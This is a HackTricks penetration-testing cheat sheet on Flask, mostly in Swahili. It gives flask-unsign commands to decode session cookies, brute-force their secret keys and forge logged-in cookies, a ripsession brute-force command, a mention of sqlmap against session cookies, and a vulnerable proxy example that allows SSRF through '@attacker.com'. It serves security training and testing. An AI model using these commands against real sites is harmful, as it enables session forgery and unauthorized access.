Flask

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.

Inawezekana kwamba ikiwa unacheza CTF, programu ya Flask itahusiana na SSTI.

Cookies

Jina chaguomsingi la cookie session ni session.

Kifasiri

Kifasiri cha cookies cha Flask mtandaoni: https://www.kirsle.net/wizards/flask-session.cgi

Kwa mkono

Chukua sehemu ya kwanza ya cookie hadi alama ya kwanza (.) kisha ufanye Base64 decode:

echo "ImhlbGxvIg" | base64 -d

Cookie pia imesainiwa kwa kutumia password

Flask-Unsign

Zana ya command line ya kuchukua, decode, brute-force na kuunda session cookies za Flask application kwa kukisia secret keys.

Client Challenge

pip3 install flask-unsign

Dekoda Cookie

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

Brute Force

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

Kusaini

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Kusaini kwa kutumia matoleo ya zamani

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

Zana ya mstari wa amri ya kufanya brute-force tovuti kwa kutumia cookies zilizotengenezwa na flask-unsign.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign. \xc2\xb7 GitHub

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

SQLi in Flask session cookie with SQLmap

This example inatumia chaguo la sqlmap eval ili kusaini moja kwa moja sqlmap payloads kwa flask kwa kutumia siri iliyojulikana.

Flask Proxy to SSRF

In this writeup inaelezea jinsi Flask inavyoruhusu ombi kuanza na alama “@”:

GET @/ HTTP/1.1
Host: target.com
Connection: close

Ambayo katika senario ifuatayo:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

Inaweza kuruhusu kuingiza kitu kama “@attacker.com” ili kusababisha SSRF.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.